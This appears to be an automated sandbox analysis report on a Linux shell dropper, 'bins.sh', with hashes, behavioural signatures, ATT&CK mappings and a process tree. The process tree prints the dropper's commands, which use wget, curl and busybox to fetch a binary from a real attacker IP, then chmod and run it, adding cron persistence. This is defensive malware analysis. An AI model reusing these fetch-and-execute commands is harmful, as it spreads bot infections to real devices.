Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24-11-2024 05:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
2eff4db1aec35dadd57ea962525f018b
-
SHA1
3d3b257f08b34cca400f3a527e8af3bc9bbc2770
-
SHA256
f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878
-
SHA512
9ada41178570c692b386fcee9c50d4de9e4e3678c1c0f9ac27321bc96050a1f7bf301c57961379b0ad415b677a85b50d0d3b27ccdb98b4ed25c0676b1aa2bfec
-
SSDEEP
192:mdFW7YIy7q5qZq5EdIkxxs7q27FYIvJpvRRh7A/ALA94wy7jnDtmJpIaTXQ08atE:FGI/HUIE94wyBP5IE94wTLB
Malware Config
Signatures
-
Contacts a large (2136) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 681 chmod -
Executes dropped EXE 1 IoCs
Processes:
U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTioc pid Process /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT 682 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT -
Renames itself 1 IoCs
Processes:
U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTpid Process 683 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.YUeOU4 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTcurldescription ioc Process File opened for reading /proc/992/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/15/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/890/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/892/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/948/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/978/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/991/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/865/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/943/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/752/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/977/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/803/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/18/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/739/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/769/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/915/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/935/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/1009/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/595/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/722/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/726/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/916/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/728/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/748/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/819/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/843/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/921/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/1/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/19/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/43/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/829/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/831/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/881/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/9/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/648/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/768/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/1000/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/278/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/707/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/718/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/957/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/23/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/741/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/930/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/859/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/867/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/876/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/877/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/907/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/599/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/798/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/827/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/958/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/998/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/805/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/913/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/918/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/1001/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/24/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/649/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/725/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/792/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT File opened for reading /proc/800/cmdline U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc Process File opened for modification /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT wget File opened for modification /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT curl File opened for modification /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:651
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵
- Writes file to tmp directory
PID:653
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵
- Writes file to tmp directory
PID:679
-
-
/bin/chmodchmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:682 -
/bin/shsh -c "crontab -l"3⤵PID:684
-
/usr/bin/crontabcrontab -l4⤵PID:685
-
-
-
/bin/shsh -c "crontab -"3⤵PID:686
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:687
-
-
-
-
/bin/rmrm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM2⤵PID:696
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD5a36b269f69477134611c5ee5f14bec00
SHA1be89e44d0c604f31af8ad8d1e43f9d922590f777
SHA25639a11717107395b58f735ac68a971ee51f0621bde40a365b601c85da08a02035
SHA512bf0c6496aabf05ff946cc29c9e9a2d7618233a03a75778a3f7ab938a4e87e9e7f0d656686bcce3a9b6c5113afc3725ee95b40df6c7058dd8396878e91cc8f378